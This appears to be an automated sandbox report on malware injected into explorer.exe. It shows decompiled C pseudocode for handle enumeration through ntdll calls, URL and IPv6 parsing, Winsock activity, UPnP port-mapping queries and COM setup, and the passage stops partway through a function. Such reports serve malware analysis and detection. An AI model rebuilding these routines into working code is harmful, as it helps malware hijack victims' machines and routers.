0x00000000
0x00000000
0x003fc694
0x003fc694
0x003fc694
0x003fc696
0x00000000
0x00000000
0x003fc698
0x003fc69a
0x00000000
0x00000000
0x00000000
0x00000000
0x003fc651
0x003fc651
0x003fc651
0x003fc653
0x00000000
0x00000000
0x003fc655
0x003fc65b
0x00000000
0x00000000
0x00000000
0x00000000
0x003fc611
0x003fc611
0x003fc611
0x003fc613
0x00000000
0x00000000
0x003fc615
0x003fc61b
0x00000000
0x003fc61b
0x003fc5fd
0x00000000
0x00000000
0x00000000
0x00000000
0x003fc5cc
0x003fc5cc
0x003fc5cc
0x003fc5ce
0x00000000
0x00000000
0x003fc5d0
0x003fc5d6
0x00000000
0x003fc5d6
0x00000000
0x003fc59f
0x00000000
0x003fc57c
0x00000000
0x00000000
0x00000000
0x00000000
0x003fc502
0x003fc502
0x003fc502
0x003fc504
0x00000000
0x00000000
0x003fc506
0x00000000
0x00000000
0x00000000
0x00000000
0x003fc4e1
0x003fc4e1
0x003fc4e1
0x003fc4e3
0x00000000
0x00000000
0x003fc4e5
0x00000000
0x00000000
0x00000000
0x00000000
0x003fc4c0
0x003fc4c0
0x003fc4c0
0x003fc4c2
0x00000000
0x00000000
0x003fc4c4
0x00000000
0x00000000
0x00000000
0x00000000
0x003fc465
0x003fc465
0x003fc465
0x003fc467
0x00000000
0x00000000
0x003fc469
0x00000000
0x00000000
0x00000000
0x00000000
0x003fc443
0x003fc443
0x003fc443
0x003fc445
0x00000000
0x00000000
0x003fc447
0x00000000
0x003fc449

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,NtQuerySystemInformation), ref: 003FC3C6
GetProcAddress.KERNEL32(00000000), ref: 003FC3CD
GetModuleHandleA.KERNEL32(ntdll.dll,NtDuplicateObject), ref: 003FC3E0
GetProcAddress.KERNEL32(00000000), ref: 003FC3E7
GetModuleHandleA.KERNEL32(ntdll.dll,NtQueryObject), ref: 003FC3FA
GetProcAddress.KERNEL32(00000000), ref: 003FC401
OpenProcess.KERNEL32(00000040,00000000,00000924), ref: 003FC434
CloseHandle.KERNEL32(00000000), ref: 003FC700

Part of subcall function 003F3EE0: HeapAlloc.KERNEL32(015A0000,00000008,00405340,?,?,003F3F90,003F7DD5,?,?,003F7DD6,00405340,00000839), ref: 003F3EF1

Part of subcall function 003F4AE0: lstrlenA.KERNEL32(003FC516,003FC516,00000000), ref: 003F4AEA

GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000), ref: 003FC588
CloseHandle.KERNEL32(00000000), ref: 003FC5D6
_wcscmp.LIBCMTD ref: 003FC5ED
CloseHandle.KERNEL32(00000000), ref: 003FC5FD
CloseHandle.KERNEL32(00000000), ref: 003FC61B
CloseHandle.KERNEL32(00000000), ref: 003FC65B
StrStrIW.SHLWAPI(?,00000000), ref: 003FC68A
CloseHandle.KERNEL32(00000000), ref: 003FC6A7

Strings

File, xrefs: 003FC5E1
NtQueryObject, xrefs: 003FC3F0
NtQuerySystemInformation, xrefs: 003FC3BC
ntdll.dll, xrefs: 003FC3C1, 003FC3DB, 003FC3F5
NtDuplicateObject, xrefs: 003FC3D6

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: Handle$Close$AddressModuleProc$Process$AllocCurrentHeapOpen_wcscmplstrlen
String ID: File$NtDuplicateObject$NtQueryObject$NtQuerySystemInformation$ntdll.dll
API String ID: 2540532776-463282066
Opcode ID: fd43b1b20d43977ce07bb3413c2eef4f3e542f2c8e738035413fec8c23f78a67
Instruction ID: b570488f2c28d60a386dc0d1d0a3d704e0caa4049ddc4205e6cc815a2a20a2ae
Opcode Fuzzy Hash: fd43b1b20d43977ce07bb3413c2eef4f3e542f2c8e738035413fec8c23f78a67
Instruction Fuzzy Hash: E8B192B0E9420CEBDF16DBA5DA55BFEB7B4AF08304F249029E701BB280D7759940CB65

Uniqueness

Uniqueness Score: 100.00%

Function 0150B8E0, Relevance: 34.8, APIs: 21, Strings: 2, Instructions: 273
stringUNIQUE

Download Yara Rule

C-Code - Quality: 48%

			E0150B8E0(char** _a4, intOrPtr _a8, CHAR* _a12, intOrPtr _a16) {
				char _v12;
				void* _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				int _t107;
				char* _t126;
				char* _t131;
				char** _t151;
				char* _t153;
				int _t154;
				int _t169;
				void* _t237;
				void* _t238;
				void* _t247;
				void* _t248;
				void* _t249;

				_t107 = strlen(_a8 + 0x80);
				_t238 = _t237 + 4;
				_v20 = _t107;
				if(_v20 == 0) {
					_t169 = strlen(_a12);
					_t238 = _t238 + 4;
					_v20 = _t169;
				}
				if(_a16 != 0) {
					E01513C30( &_v12, 8, "%u", _a16);
					_t238 = _t238 + 0x10;
				}
				_v20 = _v20 + 2;
				_v32 = _v20;
				_v28 = _v20;
				_v24 = _v20;
				_v20 = strlen(_a8 + 0x484) + _v20;
				_v32 = strlen(_a8 + 0x384) + _v32;
				_v28 = strlen(_a8 + 0x184) + _v28;
				_v24 = strlen(_a8 + 0x784) + _v24;
				_a4[1] = E01513960(_a8 + 0x184, _v20);
				 *_a4 = E01513960(_a4, _v32);
				_a4[2] = E01513960(_a4, _v28);
				_a4[3] = E01513960(_a4, _v24);
				_t126 = E01513A00(_a4, _a12, lstrlenA(_a12));
				_t247 = _t238 + 0x28;
				_a4[4] = _t126;
				if( *(_a8 + 0x80) == 0) {
					strncpy(_a4[1], _a12, _v20);
					_t248 = _t247 + 0xc;
				} else {
					strncpy(_a4[1], _a8 + 0x80, _v20);
					_t248 = _t247 + 0xc;
				}
				_t131 = strchr( &(_a4[1][7]), 0x2f);
				_t249 = _t248 + 8;
				_v16 = _t131;
				if(_v16 != 0) {
					 *_v16 = 0;
				}
				if(_a16 != 0) {
					_push(0xd);
					_push("http://[fe80:");
					_t151 = _a4;
					_push( *((intOrPtr*)(_t151 + 4)));
					L015077DC();
					_t249 = _t249 + 0xc;
					if(_t151 == 0) {
						_t153 = strchr(_a4[1], 0x5d);
						_t249 = _t249 + 8;
						_v16 = _t153;
						if(_v16 != 0) {
							_t154 = strlen(_v16);
							_t71 = strlen( &_v12) + 3; // 0x3
							memmove(_v16 + _t71, _v16, _t154 + 1);
							memcpy(_v16, "%25", 3);
							memcpy(_v16 + 3,  &_v12, strlen( &_v12));
							_t249 = _t249 + 0x30;
						}
					}
				}
				strncpy( *_a4, _a4[1], _v32);
				strncpy(_a4[2], _a4[1], _v28);
				strncpy(_a4[3], _a4[1], _v24);
				E0150BBF0(_a4[1], _a4[1], _a8 + 0x484, _v20);
				E0150BBF0(_a4,  *_a4, _a8 + 0x384, _v32);
				E0150BBF0(_a8 + 0x184, _a4[2], _a8 + 0x184, _v28);
				E0150BBF0(_a4[3], _a4[3], _a8 + 0x784, _v24);
				while(0 != 0) {
				}
				while(0 != 0) {
				}
				while(0 != 0) {
				}
				while(0 != 0) {
				}
				return 0;
			}

0x0150b8ef
0x0150b8f4
0x0150b8f7
0x0150b8fe
0x0150b904
0x0150b909
0x0150b90c
0x0150b90c
0x0150b913
0x0150b924
0x0150b929
0x0150b929
0x0150b932
0x0150b938
0x0150b93e
0x0150b944
0x0150b95c
0x0150b973
0x0150b98b
0x0150b9a3
0x0150b9b5
0x0150b9c7
0x0150b9d8
0x0150b9ea
0x0150b9fc
0x0150ba01
0x0150ba07
0x0150ba16
0x0150ba46
0x0150ba4b
0x0150ba18
0x0150ba2d
0x0150ba32
0x0150ba32
0x0150ba5a
0x0150ba5f
0x0150ba62
0x0150ba69
0x0150ba6e
0x0150ba6e
0x0150ba75
0x0150ba7b
0x0150ba7d
0x0150ba82
0x0150ba88
0x0150ba89
0x0150ba8e
0x0150ba93
0x0150ba9e
0x0150baa3
0x0150baa6
0x0150baad
0x0150bab3
0x0150bad2
0x0150bad7
0x0150baea
0x0150bb0a
0x0150bb0f
0x0150bb0f
0x0150baad
0x0150ba93
0x0150bb23
0x0150bb3d
0x0150bb57
0x0150bb74
0x0150bb8f
0x0150bbac
0x0150bbc9
0x0150bbd1
0x0150bbd5
0x0150bbd7
0x0150bbdb
0x0150bbdd
0x0150bbe1
0x0150bbe3
0x0150bbe7
0x0150bbec

APIs

strlen.MSVCRT(?,?,?,0150BFE3,00000000,?,?,?), ref: 0150B8EF
strlen.MSVCRT(00000000,?,?,?,0150BFE3), ref: 0150B904
strlen.MSVCRT(?), ref: 0150B951
strlen.MSVCRT(?), ref: 0150B968
strlen.MSVCRT(?), ref: 0150B980
strlen.MSVCRT(?), ref: 0150B998
lstrlenA.KERNEL32(00000000), ref: 0150B9F1
strncpy.MSVCRT(?,?,00000000), ref: 0150BA2D
strncpy.MSVCRT(?,00000000,00000000), ref: 0150BA46
strchr.MSVCRT(?,0000002F), ref: 0150BA5A
memcmp.MSVCRT(?,http://[fe80:,0000000D), ref: 0150BA89
strchr.MSVCRT(?,0000005D), ref: 0150BA9E
strlen.MSVCRT(00000000), ref: 0150BAB3
strlen.MSVCRT(?,00000000,-00000001), ref: 0150BAC7
memmove.MSVCRT(00000003,-00000001), ref: 0150BAD7
memcpy.MSVCRT(00000000,%25,00000003), ref: 0150BAEA
strlen.MSVCRT(?), ref: 0150BAF6
memcpy.MSVCRT(-00000003,?,00000000), ref: 0150BB0A
strncpy.MSVCRT(?,?,?), ref: 0150BB23
strncpy.MSVCRT(00000000,?,?), ref: 0150BB3D
strncpy.MSVCRT(?,?,00000000), ref: 0150BB57

Part of subcall function 0150BBF0: strncpy.MSVCRT(-00000484,?,0150BB79,?,?,0150BB79,?,-00000484,00000000), ref: 0150BC53

Part of subcall function 0150BBF0: strlen.MSVCRT(-00000484,?,?,0150BB79,?,-00000484,00000000), ref: 0150BC61
Part of subcall function 0150BBF0: strncpy.MSVCRT(00000000,?,00000000,00000000), ref: 0150BCA3

Strings

http://[fe80:, xrefs: 0150BA7D
%25, xrefs: 0150BAE1

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: strlen$strncpy$memcpystrchr$lstrlenmemcmpmemmove
String ID: %25$http://[fe80:
API String ID: 431508522-1760683457
Opcode ID: b9074e7c5ef13ee9f18d2b7dfcb3ce0224b37037be959d8c4989dd710e2a05e6
Instruction ID: bd7def10aeb554fd92133d6c7b1715b07013942081d533aad746c5bb1d68c5a9
Opcode Fuzzy Hash: b9074e7c5ef13ee9f18d2b7dfcb3ce0224b37037be959d8c4989dd710e2a05e6
Instruction Fuzzy Hash: D8A155FAD0020AABDB04DF94D8C1EAF77B5BF98204F04C528E9199F385E635E605CB91

Uniqueness

Uniqueness Score: 100.00%

Function 01509A2C, Relevance: 33.5, APIs: 17, Strings: 2, Instructions: 246UNIQUE

Download Yara Rule

APIs

_time64.MSVCRT(?), ref: 01509A4A
_time64.MSVCRT(00000000), ref: 01509A5D
#18.WS2_32(00000000,?,00000000,?,00000001), ref: 01509BBC
#151.WS2_32(?,?), ref: 01509BF9
#1.WS2_32(?,?,?,?,?), ref: 01509C1D
#3.WS2_32(?), ref: 01509C28
#151.WS2_32(?,?,?,?), ref: 01509C42
#3.WS2_32(?,?,?,?,?), ref: 01509C4E
#151.WS2_32(?,?), ref: 01509C6B
#16.WS2_32(?,?,00000100,00000000,?,?), ref: 01509C97
#111.WS2_32 ref: 01509CA1
#3.WS2_32(?), ref: 01509CBF
#3.WS2_32(?), ref: 01509CD4
#151.WS2_32(00000000,?,?,?), ref: 01509CEA
#3.WS2_32(?,00000000,?,?,?), ref: 01509CF5
#3.WS2_32(?), ref: 01509D55
#111.WS2_32 ref: 01509D7F

Strings

@, xrefs: 01509B85
@, xrefs: 01509B4B

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: #151$#111_time64
String ID: @$@
API String ID: 1596655573-149943524
Opcode ID: ab645443c148bbec110481be3089bac01fb022045163e80948e6823670e72e6e
Instruction ID: f518276e3d58b77887d0af0384b35341d4b40333028fe21c4c18d2fa11edc06d
Opcode Fuzzy Hash: ab645443c148bbec110481be3089bac01fb022045163e80948e6823670e72e6e
Instruction Fuzzy Hash: 6FA1A132800615DFDF269FA8C9C46EDB7B4FF05328F5406A9E51A9E1DAD734AA84CF10

Uniqueness

Uniqueness Score: 100.00%

Function 0150DC40, Relevance: 22.8, APIs: 11, Strings: 4, Instructions: 295
stringUNIQUE

Download Yara Rule

C-Code - Quality: 100%

			E0150DC40(char* _a4, void* _a8, signed short* _a12, char** _a16, intOrPtr* _a20) {
				char* _v8;
				char* _v12;
				char* _v16;
				char* _v20;
				void _v28;
				int _v32;
				int _v36;
				int _v40;
				int _v44;
				int _v48;
				int _v52;
				int _v56;
				char* _t130;
				char* _t157;
				char* _t158;
				intOrPtr _t182;
				void* _t270;
				void* _t271;
				void* _t272;
				void* _t273;
				void* _t279;

				if(_a4 != 0) {
					_t130 = strstr(_a4, "://");
					_t272 = _t271 + 8;
					_v16 = _t130;
					if(_v16 != 0) {
						_v16 =  &(_v16[3]);
						if( *_a4 != 0x68 || _a4[1] != 0x74 || _a4[2] != 0x74 || _a4[3] != 0x70) {
							return 0;
						} else {
							memset(_a8, 0, 0x41);
							_t273 = _t272 + 0xc;
							if( *_v16 != 0x5b) {
								L33:
								_v8 = strchr(_v16, 0x3a);
								_v12 = strchr(_v16, 0x2f);
								if(_v12 != 0) {
									if(_v8 == 0 || _v8 > _v12) {
										if(_v12 - _v16 <= 0x40) {
											_v52 = _v12 - _v16;
										} else {
											_v52 = 0x40;
										}
										_v40 = _v52;
										memcpy(_a8, _v16, _v40);
										 *((char*)(_a8 + _v40)) = 0;
										 *_a12 = 0x50;
										goto L48;
									} else {
										if(_v8 - _v16 <= 0x40) {
											_v56 = _v8 - _v16;
										} else {
											_v56 = 0x40;
										}
										_v44 = _v56;
										memcpy(_a8, _v16, _v44);
										 *((char*)(_a8 + _v44)) = 0;
										 *_a12 = 0;
										_v8 =  &(_v8[1]);
										while( *_v8 >= 0x30 &&  *_v8 <= 0x39) {
											 *_a12 = ( *_a12 & 0x0000ffff) * 0xa;
											 *_a12 = ( *_a12 & 0x0000ffff) + ( *_v8 - 0x00000030 & 0x0000ffff);
											_v8 =  &(_v8[1]);
										}
										L48:
										 *_a16 = _v12;
										return 1;
									}
								}
								return 0;
							}
							_v20 = strchr(_v16, 0x25);
							_t157 = strchr(_v16, 0x5d);
							_t279 = _t273 + 0x10;
							_v8 = _t157;
							if(_v8 != 0 && _v20 != 0 && _v20 < _v8 && _a20 != 0) {
								_v20 =  &(_v20[1]);
								if( *_v20 == 0x32 && _v20[1] == 0x35) {
									_v20 =  &(_v20[2]);
								}
								_v32 = _v8 - _v20;
								if(_v32 >= 8) {
									_v32 = 7;
								}
								memcpy( &_v28, _v20, _v32);
								 *((char*)(_t270 + _v32 - 0x18)) = 0;
								_t182 = E015140E0( &_v28, 0, 0xa);
								_t279 = _t279 + 0x18;
								 *_a20 = _t182;
							}
							_t158 = strchr(_v16, 0x2f);
							_t273 = _t279 + 8;
							_v12 = _t158;
							if(_v8 == 0 || _v12 == 0) {
								goto L33;
							} else {
								_v8 =  &(_v8[1]);
								if(_v8 - _v16 <= 0x40) {
									_v48 = _v8 - _v16;
								} else {
									_v48 = 0x40;
								}
								_v36 = _v48;
								memcpy(_a8, _v16, _v36);
								 *((char*)(_a8 + _v36)) = 0;
								if( *_v8 != 0x3a) {
									 *_a12 = 0x50;
									goto L32;
								} else {
									 *_a12 = 0;
									_v8 =  &(_v8[1]);
									while( *_v8 >= 0x30 &&  *_v8 <= 0x39) {
										 *_a12 = ( *_a12 & 0x0000ffff) * 0xa;
										 *_a12 = ( *_a12 & 0x0000ffff) + ( *_v8 - 0x00000030 & 0x0000ffff);
										_v8 =  &(_v8[1]);
									}
									L32:
									 *_a16 = _v12;
									return 1;
								}
							}
						}
					}
					return 0;
				}
				return 0;
			}

0x0150dc4a
0x0150dc5c
0x0150dc61
0x0150dc64
0x0150dc6b
0x0150dc7a
0x0150dc86
0x00000000
0x0150dcb3
0x0150dcbb
0x0150dcc0
0x0150dccc
0x0150de75
0x0150de83
0x0150de94
0x0150de9b
0x0150dea8
0x0150debb
0x0150decc
0x0150debd
0x0150debd
0x0150debd
0x0150ded2
0x0150dee1
0x0150deef
0x0150defa
0x00000000
0x0150df02
0x0150df0b
0x0150df1c
0x0150df0d
0x0150df0d
0x0150df0d
0x0150df22
0x0150df31
0x0150df3f
0x0150df47
0x0150df50
0x0150df53
0x0150df75
0x0150df8f
0x0150df98
0x0150df98
0x0150df9d
0x0150dfa3
0x00000000
0x0150dfa5
0x0150dea8
0x00000000
0x0150de9d
0x0150dce0
0x0150dce9
0x0150dcee
0x0150dcf1
0x0150dcf8
0x0150dd18
0x0150dd24
0x0150dd38
0x0150dd38
0x0150dd41
0x0150dd48
0x0150dd4a
0x0150dd4a
0x0150dd5d
0x0150dd68
0x0150dd75
0x0150dd7a
0x0150dd80
0x0150dd80
0x0150dd88
0x0150dd8d
0x0150dd90
0x0150dd97
0x00000000
0x0150dda7
0x0150ddad
0x0150ddb9
0x0150ddca
0x0150ddbb
0x0150ddbb
0x0150ddbb
0x0150ddd0
0x0150dddf
0x0150dded
0x0150ddf9
0x0150de60
0x00000000
0x0150ddfb
0x0150de00
0x0150de09
0x0150de0c
0x0150de2e
0x0150de48
0x0150de51
0x0150de51
0x0150de63
0x0150de69
0x00000000
0x0150de6b
0x0150ddf9
0x0150dd97
0x0150dc86
0x00000000
0x0150dc6d
0x00000000

APIs

strstr.MSVCRT(00000000,://,?,?,?,?,?,?,?,0150AE4C,?,?,00000000), ref: 0150DC5C

Strings

://, xrefs: 0150DC53
@, xrefs: 0150DEBD
@, xrefs: 0150DDBB
@, xrefs: 0150DF0D

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: strstr
String ID: ://$@$@$@
API String ID: 1392478783-1485139355
Opcode ID: c7cee6cb21f9cdd9a0dd4b29edc3326ca8bf37e439aa79b4e67c9264392c6811
Instruction ID: ad1be732502c7a49e304f29801ebb60d1939fef32c297aff136d128229a7db74
Opcode Fuzzy Hash: c7cee6cb21f9cdd9a0dd4b29edc3326ca8bf37e439aa79b4e67c9264392c6811
Instruction Fuzzy Hash: E1C121B1D04209EFCB05CFE8C990AAEBBB1FF59300F148599E815AF384D7359A41CB54

Uniqueness

Uniqueness Score: 100.00%

Function 0151CBAF, Relevance: 22.7, APIs: 15, Instructions: 247comstringUNIQUE

Download Yara Rule

APIs

Part of subcall function 01516E70: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,0000000A,?,?,01504CF5,?,?,00000020,?,00000000,00000040,?), ref: 01516E86

CoInitializeEx.OLE32(00000000,00000000), ref: 0151CBD9
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 0151CBEB
CoCreateInstance.OLE32(0152FEDC,00000000,00000001,0152FCCC,?), ref: 0151CC05
CoUninitialize.OLE32 ref: 0151CC12
#8.OLEAUT32(?), ref: 0151CC29
#8.OLEAUT32(?), ref: 0151CC39
#8.OLEAUT32(?), ref: 0151CC4C
#8.OLEAUT32(?), ref: 0151CC5F
#9.OLEAUT32(?), ref: 0151CCAC
#9.OLEAUT32(?), ref: 0151CCB2
#9.OLEAUT32(?), ref: 0151CCB8
#9.OLEAUT32(?), ref: 0151CCBE
#9.OLEAUT32(?), ref: 0151CD75
#6.OLEAUT32(00000000), ref: 0151CD93
lstrcmpW.KERNEL32(?,00000000), ref: 0151CDA3

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: Initialize$ByteCharCreateInstanceMultiSecurityUninitializeWidelstrcmp
String ID:
API String ID: 3306858439-0
Opcode ID: 7b48f9d1390af0e2f08eb5b93e09bf5933e194165d3dc98d08cd5bb7669d17a3
Instruction ID: 8f0a6bd002d88ee58aebb96d5ddb11839188425f038dbf356b8004fd1a50d772
Opcode Fuzzy Hash: 7b48f9d1390af0e2f08eb5b93e09bf5933e194165d3dc98d08cd5bb7669d17a3
Instruction Fuzzy Hash: 14816A72D00619AFCF12DFA8C948A9FBBBAFF4A314F100545F915EF144D675AA06CB90

Uniqueness

Uniqueness Score: 100.00%

Function 0150C6F0, Relevance: 22.7, APIs: 5, Strings: 10, Instructions: 190
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0150C6F0(void* __ecx, intOrPtr _a4, intOrPtr _a8, char* _a12, char* _a16, char* _a20, char* _a24, char* _a28, char* _a32, char* _a36) {
				char* _v8;
				char** _v12;
				char _v16;
				char _v108;
				char _v112;
				char _v116;
				char _t85;
				char* _t90;
				char* _t92;
				char* _t93;
				char* _t95;
				char* _t96;
				char* _t97;
				intOrPtr _t102;
				void* _t144;
				void* _t146;
				void* _t149;
				void* _t150;
				void* _t151;
				void* _t152;
				void* _t153;
				void* _t154;

				_v112 = 0xffffffff;
				if(_a24 == 0 || _a20 == 0 || _a12 == 0 || _a16 == 0) {
					return 0xfffffffe;
				}
				_v12 = E01513960(__ecx, 0x20);
				 *_v12 = "NewRemoteHost";
				_v12[2] = "NewExternalPort";
				_v12[3] = _a12;
				_v12[4] = "NewProtocol";
				_v12[5] = _a16;
				_t85 = E0150AEF0(_a4, 0xffffffff, _a4, _a8, "GetSpecificPortMappingEntry", _v12,  &_v16);
				_t146 = _t144 + 0x1c;
				_v116 = _t85;
				__eflags = _v116;
				if(_v116 != 0) {
					E0150E6C0(_v116, _v16,  &_v108);
					E01513990( &_v116, 0);
					_t90 = E0150E9B0( &_v108, "NewInternalClient");
					_t149 = _t146 + 0x1c;
					_v8 = _t90;
					__eflags = _v8;
					if(_v8 == 0) {
						 *_a20 = 0;
					} else {
						strncpy(_a20, _v8, 0x10);
						_t149 = _t149 + 0xc;
						_a20[0xf] = 0;
						_v112 = 0;
					}
					_t92 = E0150E9B0( &_v108, "NewInternalPort");
					_t150 = _t149 + 8;
					_v8 = _t92;
					__eflags = _v8;
					if(_v8 == 0) {
						 *_a24 = 0;
					} else {
						strncpy(_a24, _v8, 6);
						_t150 = _t150 + 0xc;
						_a24[5] = 0;
					}
					_t93 = E0150E9B0( &_v108, "NewEnabled");
					_t151 = _t150 + 8;
					_v8 = _t93;
					__eflags = _v8;
					if(_v8 != 0) {
						__eflags = _a32;
						if(_a32 != 0) {
							strncpy(_a32, _v8, 4);
							_t151 = _t151 + 0xc;
							_a32[3] = 0;
						}
					}
					_t95 = E0150E9B0( &_v108, "NewPortMappingDescription");
					_t152 = _t151 + 8;
					_v8 = _t95;
					__eflags = _v8;
					if(_v8 != 0) {
						__eflags = _a28;
						if(_a28 != 0) {
							strncpy(_a28, _v8, 0x50);
							_t152 = _t152 + 0xc;
							_a28[0x4f] = 0;
						}
					}
					_t96 = E0150E9B0( &_v108, "NewLeaseDuration");
					_t153 = _t152 + 8;
					_v8 = _t96;
					__eflags = _v8;
					if(_v8 != 0) {
						__eflags = _a36;
						if(_a36 != 0) {
							strncpy(_a36, _v8, 0x10);
							_t153 = _t153 + 0xc;
							_a36[0xf] = 0;
						}
					}
					_t97 = E0150E9B0( &_v108, "errorCode");
					_t154 = _t153 + 8;
					_v8 = _t97;
					__eflags = _v8;
					if(__eflags != 0) {
						_v112 = 0xffffffff;
						_t102 = E01513E60(__eflags, _v8);
						_t154 = _t154 + 4;
						_v112 = _t102;
					}
					E0150E930( &_v108,  &_v108);
					E01513990( &_v12, 0);
					return _v112;
				} else {
					E01513990( &_v12, 0);
					return 0xfffffffd;
				}
			}

0x0150c6f6
0x0150c701
0x00000000
0x0150c715
0x0150c729
0x0150c72f
0x0150c738
0x0150c745
0x0150c74b
0x0150c758
0x0150c772
0x0150c777
0x0150c77a
0x0150c77d
0x0150c781
0x0150c7a7
0x0150c7b5
0x0150c7c6
0x0150c7cb
0x0150c7ce
0x0150c7d1
0x0150c7d5
0x0150c7fc
0x0150c7d7
0x0150c7e1
0x0150c7e6
0x0150c7ec
0x0150c7f0
0x0150c7f0
0x0150c808
0x0150c80d
0x0150c810
0x0150c813
0x0150c817
0x0150c837
0x0150c819
0x0150c823
0x0150c828
0x0150c82e
0x0150c82e
0x0150c843
0x0150c848
0x0150c84b
0x0150c84e
0x0150c852
0x0150c854
0x0150c858
0x0150c864
0x0150c869
0x0150c86f
0x0150c86f
0x0150c858
0x0150c87c
0x0150c881
0x0150c884
0x0150c887
0x0150c88b
0x0150c88d
0x0150c891
0x0150c89d
0x0150c8a2
0x0150c8a8
0x0150c8a8
0x0150c891
0x0150c8b5
0x0150c8ba
0x0150c8bd
0x0150c8c0
0x0150c8c4
0x0150c8c6
0x0150c8ca
0x0150c8d6
0x0150c8db
0x0150c8e1
0x0150c8e1
0x0150c8ca
0x0150c8ee
0x0150c8f3
0x0150c8f6
0x0150c8f9
0x0150c8fd
0x0150c8ff
0x0150c90a
0x0150c90f
0x0150c912
0x0150c912
0x0150c919
0x0150c927
0x00000000
0x0150c783
0x0150c789
0x00000000
0x0150c791

APIs

strncpy.MSVCRT(00000000,00000000,00000010), ref: 0150C7E1
strncpy.MSVCRT(00000000,00000000,00000006), ref: 0150C823
strncpy.MSVCRT(00000000,00000000,00000004), ref: 0150C864
strncpy.MSVCRT(00000000,00000000,00000050), ref: 0150C89D
strncpy.MSVCRT(00000000,00000000,00000010), ref: 0150C8D6

Strings

NewPortMappingDescription, xrefs: 0150C873
NewExternalPort, xrefs: 0150C738
NewInternalClient, xrefs: 0150C7BD
NewInternalPort, xrefs: 0150C7FF
NewProtocol, xrefs: 0150C74B
NewEnabled, xrefs: 0150C83A
GetSpecificPortMappingEntry, xrefs: 0150C763
errorCode, xrefs: 0150C8E5
NewRemoteHost, xrefs: 0150C72F
NewLeaseDuration, xrefs: 0150C8AC

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: strncpy
String ID: GetSpecificPortMappingEntry$NewEnabled$NewExternalPort$NewInternalClient$NewInternalPort$NewLeaseDuration$NewPortMappingDescription$NewProtocol$NewRemoteHost$errorCode
API String ID: 3301158039-2659533291
Opcode ID: 00013e8dc37ad4739e4ad3bd4c3b366d269d188dc5bb8b00d257071148a2f815
Instruction ID: 1ada3a59f8091d2ca382a0e1441af61ae0b49729c6fa8313377da3a9ef0b26a2
Opcode Fuzzy Hash: 00013e8dc37ad4739e4ad3bd4c3b366d269d188dc5bb8b00d257071148a2f815
Instruction Fuzzy Hash: 68719CB5D00209EBDB05DFE8D885BDE7BB4BF99304F144A98E9056F2C1E3709A44CBA1

Uniqueness

Uniqueness Score: 8.94%

Function 01509D8E, Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 308
sleepthreadUNIQUE

Download Yara Rule

C-Code - Quality: 87%

			E01509D8E(void* __ecx, void* __fp0, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, void* _a16, intOrPtr _a20, void* _a24) {
				long _v8;
				long _v12;
				long _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v540;
				char _v796;
				void* _v1836;
				signed int _t121;
				void* _t122;
				void* _t126;
				char _t127;
				intOrPtr* _t137;
				void* _t141;
				void* _t147;
				void* _t154;
				signed int _t156;
				signed int _t158;
				void* _t164;
				int _t169;
				intOrPtr _t180;
				void** _t181;
				void* _t186;
				long _t189;
				long _t194;
				intOrPtr* _t201;
				void* _t207;
				void* _t210;
				void* _t218;
				signed int _t222;
				void* _t226;
				void* _t229;
				void* _t232;
				intOrPtr* _t233;
				void* _t234;
				void* _t235;
				void* _t236;
				void* _t238;
				void* _t240;

				_t240 = __fp0;
				_v16 = 0;
				_v12 = 0;
				_v28 = 0;
				_v24 = 0;
				_t121 = E01513960(__ecx, 0x114010c);
				_pop(_t203);
				_v12 = _t121;
				if(_t121 == 0) {
					return _t121 | 0xffffffff;
				}
				__eflags =  *0x1538aa4 - 6;
				_v8 = 0;
				if( *0x1538aa4 < 6) {
					_t122 = E0151D810(_t203);
					__eflags = _t122;
					if(_t122 != 0) {
						_t189 = E01515230(_t203, 0x1b2c);
						_push( *0x153a704);
						_v8 = _t189;
						E01513CA0( &_v1836, 0x104, _t189, "C:\Windows\explorer.exe");
						E01515460( &_v8);
						_t233 = _t233 + 0x1c;
					}
				} else {
					__eflags =  *0x1539ed0 - 3;
					if( *0x1539ed0 == 3) {
						_t194 = E01515230(_t203, 0x1e37);
						 *_t233 = 0x153a4f8;
						_v8 = _t194;
						E01513CA0( &_v1836, 0x208, _t194,  *0x153a704);
						E01515460( &_v8);
						_t233 = _t233 + 0x18;
					}
				}
				__eflags = _v1836;
				if(_v1836 != 0) {
					_t186 = E0151B220(_t203,  &_v1836,  &_v20, 0, 1);
					_t238 = _t233 + 0x10;
					__eflags = _t186;
					if(_t186 != 0) {
						_v16 = 1;
						Sleep(0x1388);
					}
					E01513BA0(_t203,  &_v1836, 0, 0x410);
					_t233 = _t238 + 0xc;
				}
